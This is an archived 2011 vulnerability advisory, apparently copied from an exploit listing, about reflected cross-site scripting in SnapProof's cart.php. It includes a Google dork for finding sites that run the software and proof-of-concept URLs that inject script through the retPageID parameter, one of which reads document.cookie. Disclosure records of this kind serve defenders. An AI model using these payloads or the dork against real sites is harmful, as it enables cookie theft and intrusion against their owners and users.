SnapProof (cart.php) Cross Site Scripting

2011-03-01T00:00:00
ID SECURITYVULNS:DOC:25823
Type securityvulns
Reporter Securityvulns
Modified 2011-03-01T00:00:00

Description

Exploit Title: SnapProof (cart.php) Cross Site Scripting

Google Dork: inurl:"Created and powered by SnapProof"

home : www.D99Y.com

Date: 1/3/2011

Author: Difficult 511

Software Link: http://www.snapproof.com/

file :

cart.php

exploit :

http://localhost/cart.php?retPageID= [ XSS ]

http://localhost/cart.php?retPageID=<script>alert(12345)</script>

http://localhost/cart.php?retPageID=<script>alert(document.cookie)</script>

Greetz :

NassRawI and all members D99Y.com

Enjoy :)